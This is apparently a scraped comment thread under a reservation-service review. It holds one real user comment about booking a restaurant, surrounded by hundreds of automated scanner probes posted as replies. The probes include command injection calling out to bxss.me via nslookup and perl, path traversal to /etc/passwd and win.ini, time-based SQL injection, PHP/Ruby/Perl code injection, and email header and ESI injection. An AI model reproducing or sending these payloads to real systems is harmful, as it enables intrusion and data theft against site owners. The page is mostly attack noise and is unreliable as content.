$(nslookup hitlgqzoizlfka82a8.bxss.me||perl -e "gethostbyname('hitlgqzoizlfka82a8.bxss.me')")

1727141233

re: guest

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141234

re: guest

&nslookup hitjmoiqzlngqdffeb.bxss.me&'\"`0&nslookup hitjmoiqzlngqdffeb.bxss.me&`'

1727141234

re: guest

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141235

re: guest

&(nslookup hittkuttjidym4789a.bxss.me||perl -e "gethostbyname('hittkuttjidym4789a.bxss.me')")&'\"`0&(nslookup hittkuttjidym4789a.bxss.me||perl -e "gethostbyname('hittkuttjidym4789a.bxss.me')")&`'

1727141235

1727141235

re: guest

"+"A".concat(70-3).concat(22*4).concat(102).concat(72).concat(120).concat(83)+(require"socket"
Socket.gethostbyname("hitbg"+"ouegvlqp0a3d2.bxss.me.")[3].to_s)+"

1727141235

re: guest

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141235

re: guest

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141235

re: guest

|(nslookup hitvoueqpzvbg87102.bxss.me||perl -e "gethostbyname('hitvoueqpzvbg87102.bxss.me')")

1727141235

re: guest

bxss.me/t/xss.html?%00

1727141236

re: guest

'+'A'.concat(70-3).concat(22*4).concat(99).concat(66).concat(104).concat(90)+(require'socket'
Socket.gethostbyname('hitez'+'wpjellxue1b27.bxss.me.')[3].to_s)+'

1727141236

1727141236

re: guest

file:///etc/passwd

1727141236

re: guest

`(nslookup hitvdonfbvisp396c5.bxss.me||perl -e "gethostbyname('hitvdonfbvisp396c5.bxss.me')")`

1727141236

1727141237

re: guest

/\../\../\../\../\../\../\../etc/passwd

1727141237

re: guest

;(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")|(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")&(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")

1727141237

re: guest

/etc/shells

1727141237

re: guest

/WEB-INF/web.xml

1727141238

re: guest

c:/windows/win.ini

1727141238

re: guest

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141238

re: guest

C:\WINDOWS\system32\drivers\etc\hosts

1727141238

re: guest

bxss.me

1727141239

re: guest

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141240

re: guest

../../../../../../../../../../windows/win.ini%00.jpg

1727141241

re: guest

';print(md5(31337));$a='

1727141244

re: guest

/../../../../../../../../../../boot.ini

1727141244

re: guest

";print(md5(31337));$a="

1727141245

re: guest

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141246

re: guest

'"

1727141246

re: guest

${@print(md5(31337))}

1727141246

re: guest

..\..\..\..\..\..\..\..\windows\win.ini

1727141247

re: guest

<!--

1727141247

re: guest

${@print(md5(31337))}\

1727141247

re: guest

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141247

re: guest

'.print(md5(31337)).'

1727141247

re: guest

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141247

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141248

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141248

re: guest

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141249

re: guest

WEB-INF/web.xml

1727141249

re: guest

WEB-INF\web.xml

1727141250

re: guest

1

1727141698

re: guest

1

1727141713

re: guest

-1 OR 2+716-716-1=0+0+0+1 --

1727141713

re: guest

-1 OR 3+716-716-1=0+0+0+1 --

1727141714

re: guest

-1 OR 2+249-249-1=0+0+0+1

1727141714

re: guest

-1 OR 3+249-249-1=0+0+0+1

1727141715

re: guest

-1' OR 2+884-884-1=0+0+0+1 --

1727141715

re: guest

-1' OR 3+884-884-1=0+0+0+1 --

1727141716

re: guest

-1' OR 2+556-556-1=0+0+0+1 or '4K5zCJv3'='

1727141716

re: guest

-1' OR 3+556-556-1=0+0+0+1 or '4K5zCJv3'='

1727141717

re: guest

-1" OR 2+975-975-1=0+0+0+1 --

1727141717

re: guest

-1" OR 3+975-975-1=0+0+0+1 --

1727141718

re: guest

if(now()=sysdate(),sleep(15),0)

1727141729

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141742

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141751

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141762

re: guest

-1; waitfor delay '0:0:15' --

1727141772

re: guest

-1); waitfor delay '0:0:15' --

1727141781

re: guest

1 waitfor delay '0:0:15' --

1727141789

re: guest

ww0tV5jQ'; waitfor delay '0:0:15' --

1727141798

re: guest

-5 OR 337=(SELECT 337 FROM PG_SLEEP(15))--

1727141806

re: guest

-5) OR 573=(SELECT 573 FROM PG_SLEEP(15))--

1727141815

re: guest

-1)) OR 281=(SELECT 281 FROM PG_SLEEP(15))--

1727141830

re: guest

W9GN419h' OR 355=(SELECT 355 FROM PG_SLEEP(15))--

1727141840

re: guest

Hi4GjAeP') OR 882=(SELECT 882 FROM PG_SLEEP(15))--

1727141851

re: guest

3MPIpRvn')) OR 620=(SELECT 620 FROM PG_SLEEP(15))--

1727141864

re: guest

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141878

re: guest

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141891

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1727141928

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1727141977

re: guest

1'"

1727141979

re: guest

@@uJusW

1727141983

re: guest

1

1727383016

re: guest

1

1727383016

re: guest

1

1727383016

re: guest

1

1727383564

re: guest

1

1727383564

re: guest

1

1727383564

Tried using it to book Sharikimon Chawanbu, and received an unsuccessful response after 3 days (they tried for 2 days but couldn’t get through).

Succeeded in reserving twice on previous occasions by simply calling, and didn’t find it to be a terribly hard reservation to make. So I wasn’t impressed with Autoreserve, haha.

1680605735 Reply
Add photos

re: JJ

BfMfVSXp

1697002534

re: JJ

1*

1697002534

re: JJ

1*

1697002535

re: JJ

1*

1697002535

re: JJ

1*

1697002535

re: JJ

-1 OR 2+22-22-1=0+0+0+1

1697002535

re: JJ

-1 OR 3+22-22-1=0+0+0+1

1697002535

re: JJ

if(now()=sysdate(),sleep(15),0)

1697002540

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002545

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002550

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002555

re: JJ

-1; waitfor delay '0:0:15' --

1697002560

re: JJ

-1); waitfor delay '0:0:15' --

1697002565

re: JJ

1 waitfor delay '0:0:15' --

1697002569

re: JJ

WXFC0K64'; waitfor delay '0:0:15' --

1697002573

re: JJ

-5 OR 518=(SELECT 518 FROM PG_SLEEP(15))--

1697002577

re: JJ

ZoWaSAA9

1697002580

re: JJ

1*

1697002580

re: JJ

1*

1697002581

re: JJ

1*

1697002581

re: JJ

1*

1697002581

re: JJ

-1 OR 2+81-81-1=0+0+0+1

1697002581

re: JJ

-1 OR 3+81-81-1=0+0+0+1

1697002581

re: JJ

-5) OR 470=(SELECT 470 FROM PG_SLEEP(15))--

1697002582

re: JJ

if(now()=sysdate(),sleep(15),0)

1697002585

re: JJ

-1)) OR 571=(SELECT 571 FROM PG_SLEEP(15))--

1697002587

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002589

re: JJ

DiLxp81h' OR 757=(SELECT 757 FROM PG_SLEEP(15))--

1697002590

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002595

re: JJ

9ZbxIKIQ') OR 782=(SELECT 782 FROM PG_SLEEP(15))--

1697002596

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002599

re: JJ

87aUNrUe')) OR 650=(SELECT 650 FROM PG_SLEEP(15))--

1697002600

re: JJ

-1; waitfor delay '0:0:15' --

1697002603

re: JJ


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002604

re: JJ

-1); waitfor delay '0:0:15' --

1697002607

re: JJ


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002609

re: JJ

1 waitfor delay '0:0:15' --

1697002613

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1697002615

re: JJ

FoQLWcBl'; waitfor delay '0:0:15' --

1697002618

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1697002619

re: JJ

1'"

1697002619

re: JJ

@@JSmRR

1697002620

re: JJ

-5 OR 120=(SELECT 120 FROM PG_SLEEP(15))--

1697002622

re: JJ

-5) OR 727=(SELECT 727 FROM PG_SLEEP(15))--

1697002626

re: JJ

-1)) OR 114=(SELECT 114 FROM PG_SLEEP(15))--

1697002630

re: JJ

y4J2myeG' OR 934=(SELECT 934 FROM PG_SLEEP(15))--

1697002636

re: JJ

4r24BZOY') OR 197=(SELECT 197 FROM PG_SLEEP(15))--

1697002640

re: JJ

uZJO7hnE')) OR 195=(SELECT 195 FROM PG_SLEEP(15))--

1697002644

re: JJ


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002648

re: JJ


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002654

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1697002661

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1697002665

re: JJ

1'"

1697002665

re: JJ

@@oySq6

1697002666

re: JJ

1oI5CvbnO

1727141188

re: JJ

response.write(9645929*9158520)

1727141193

re: JJ

'+response.write(9645929*9158520)+'

1727141194

re: JJ

<esi:include src="http://bxss.me/rpb.png"/>

1727141194

re: JJ

%0abcc:074625.67-13768.67.6f84a.19990.2@bxss.me

1727141194

re: JJ

"+response.write(9645929*9158520)+"

1727141194

re: JJ

to@example.com>%0d%0abcc:074625.67-13769.67.6f84a.19990.2@bxss.me

1727141195

re: JJ

${9999612+9999044}

1727141196

re: JJ

../../../../../../../../../../../../../../etc/passwd

1727141198

re: JJ

../../../../../../../../../../../../../../windows/win.ini

1727141199

re: JJ

file:///etc/passwd

1727141200

re: JJ

)

1727141201

re: JJ

../../../../../../../../../../../../../../../proc/version

1727141201

re: JJ

'.gethostbyname(lc('hitdw'.'vihexltiee1cb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(74).chr(118).chr(68).'

1727141201

re: JJ

!(()&&!|*|*|

1727141202

re: JJ

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727141202

re: JJ

".gethostbyname(lc("hitix"."npoatckpefa99.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(68).chr(118).chr(70)."

1727141202

re: JJ

^(#$!@#$)(()))******

1727141203

re: JJ

../../../../../../../../../../etc/passwd%00.jpg

1727141203

re: JJ

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727141204

re: JJ

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727141204

re: JJ

echo obgxph$()\ zmfnhx\nz^xyu||a #' &echo obgxph$()\ zmfnhx\nz^xyu||a #|" &echo obgxph$()\ zmfnhx\nz^xyu||a #

1727141205

re: JJ

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727141205

re: JJ

&echo bgrsbq$()\ reapni\nz^xyu||a #' &echo bgrsbq$()\ reapni\nz^xyu||a #|" &echo bgrsbq$()\ reapni\nz^xyu||a #

1727141206

re: JJ

/etc/passwd

1727141206

re: JJ

|echo txtazf$()\ uitpun\nz^xyu||a #' |echo txtazf$()\ uitpun\nz^xyu||a #|" |echo txtazf$()\ uitpun\nz^xyu||a #

1727141208

re: JJ

%2fetc%2fpasswd

1727141208

1727141208

re: JJ

"+"A".concat(70-3).concat(22*4).concat(116).concat(86).concat(116).concat(78)+(require"socket"
Socket.gethostbyname("hitdy"+"sxjrgpipb4122.bxss.me.")[3].to_s)+"

1727141209

re: JJ

(nslookup hitruzjwfjost835e8.bxss.me||perl -e "gethostbyname('hitruzjwfjost835e8.bxss.me')")

1727141209

re: JJ

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141209

re: JJ

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141210

re: JJ

bxss.me/t/xss.html?%00

1727141210

re: JJ

'+'A'.concat(70-3).concat(22*4).concat(102).concat(90).concat(113).concat(82)+(require'socket'
Socket.gethostbyname('hitas'+'unvvfovz1f2cb.bxss.me.')[3].to_s)+'

1727141210

re: JJ

$(nslookup hitsvquboiphlc2516.bxss.me||perl -e "gethostbyname('hitsvquboiphlc2516.bxss.me')")

1727141210

re: JJ

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141210

1727141210

re: JJ

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141211

re: JJ

&nslookup hityhsdwqbvgw768db.bxss.me&'\"`0&nslookup hityhsdwqbvgw768db.bxss.me&`'

1727141211

re: JJ

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141212

1727141212

re: JJ

&(nslookup hitbouttzgdjkae401.bxss.me||perl -e "gethostbyname('hitbouttzgdjkae401.bxss.me')")&'\"`0&(nslookup hitbouttzgdjkae401.bxss.me||perl -e "gethostbyname('hitbouttzgdjkae401.bxss.me')")&`'

1727141212

re: JJ

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141212

re: JJ

/etc/shells

1727141213

re: JJ

|(nslookup hitlugugqolaqfae79.bxss.me||perl -e "gethostbyname('hitlugugqolaqfae79.bxss.me')")

1727141213

re: JJ

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141213

re: JJ

c:/windows/win.ini

1727141213

re: JJ

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141214

re: JJ

`(nslookup hituanfeoslzub509f.bxss.me||perl -e "gethostbyname('hituanfeoslzub509f.bxss.me')")`

1727141214

re: JJ

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141214

re: JJ

bxss.me

1727141214

re: JJ

'"

1727141214

re: JJ

';print(md5(31337));$a='

1727141214

re: JJ

;(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")|(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")&(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")

1727141215

re: JJ

file:///etc/passwd

1727141215

re: JJ

<!--

1727141215

re: JJ

";print(md5(31337));$a="

1727141215

re: JJ

/\../\../\../\../\../\../\../etc/passwd

1727141216

re: JJ

${@print(md5(31337))}

1727141216

re: JJ

/WEB-INF/web.xml

1727141216

re: JJ

${@print(md5(31337))}\

1727141217

re: JJ

C:\WINDOWS\system32\drivers\etc\hosts

1727141217

re: JJ

'.print(md5(31337)).'

1727141218

re: JJ

../../../../../../../../../../windows/win.ini%00.jpg

1727141218

re: JJ

/../../../../../../../../../../boot.ini

1727141218

re: JJ

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141219

re: JJ

..\..\..\..\..\..\..\..\windows\win.ini

1727141220

re: JJ

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141221

re: JJ

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141222

re: JJ

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141222

re: JJ

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141223

re: JJ

